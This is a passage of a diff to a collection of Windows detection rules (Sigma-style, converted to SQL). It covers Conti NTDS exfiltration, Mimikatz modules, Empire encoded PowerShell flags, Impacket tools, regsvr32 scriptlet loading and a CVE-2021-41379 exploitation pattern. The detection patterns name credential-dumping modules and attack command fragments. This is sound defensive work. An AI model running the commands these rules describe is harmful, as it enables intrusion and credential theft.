- "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "title": "Conti NTDS Exfiltration Command", + "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "status": "test", - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command used by conti to exfiltrate NTDS", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.collection", + "attack.t1560" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_createminidump.yml" + "filename": "proc_creation_win_malware_conti_7zip.yml" }, { - "title": "Suspicious GrpConv Execution", - "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", - "status": "experimental", - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Tor Client/Browser Execution", + "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "status": "test", + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\tor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml" + "filename": "proc_creation_win_browsers_tor_execution.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile", - "id": "4cbef972-f347-4170-b62a-8253f6168e6d", - "status": "experimental", - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", + "status": "test", + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "author": "Markus Neis", "tags": [ - "attack.execution", - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1546.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" + "filename": "proc_creation_win_sdbinst_shim_persistence.yml" }, { - "title": "Webshell Detection With Command Line Keywords", - "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "title": "Suspicious Mshta.EXE Execution Patterns", + "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "status": "experimental", - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "description": "Detects suspicious mshta process execution patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.execution", + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_webshell_detection.yml" - }, - { - "title": "HackTool - GMER Rootkit Detector and Remover Execution", - "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", - "status": "experimental", - "description": "Detects the execution GMER tool based on image and hash fields.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_hktl_gmer.yml" + "filename": "proc_creation_win_mshta_susp_pattern.yml" }, { - "title": "PowerShell Base64 Encoded WMI Classes", - "id": "1816994b-42e1-4fb1-afd2-134d88184f71", + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", "status": "experimental", - "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"\"...etc.", - "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" + "filename": "proc_creation_win_regsvr32_anomalies.yml" }, { - "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", - "id": "37db85d1-b089-490a-a59a-c7b6f984f480", + "title": "Potential CVE-2021-41379 Exploitation Attempt", + "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", "status": "test", - "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", - "author": "frack113", + "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" ], - "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" + "filename": "proc_creation_win_exploit_cve_2021_41379.yml" }, { - "title": "Potential Recon Activity Via Nltest.EXE", - "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "title": "Script Event Consumer Spawning Process", + "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Craig Young, oscd.community, Georg Lauenstein", + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "author": "Sittikorn S", "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1482" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Legitimate administration use but user and host must be investigated" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nltest_recon.yml" + "filename": "proc_creation_win_scrcons_susp_child_process.yml" }, { - "title": "HackTool - Mimikatz Execution", - "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "title": "HackTool - Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "status": "test", - "description": "Detection well-known mimikatz command line arguments", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "description": "Detects suspicious powershell command line parameters used in Empire", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Other tools that incidentally use the same command line parameters" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" + "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" }, { - "title": "Sticky Key Like Backdoor Execution", - "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "title": "HackTool - Impacket Tools Execution", + "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "status": "test", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the impacket tools" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\goldenPac%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\kintercept%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rpcdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\samrdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\secretsdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmiexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ticketer\\_windows.exe' ESCAPE 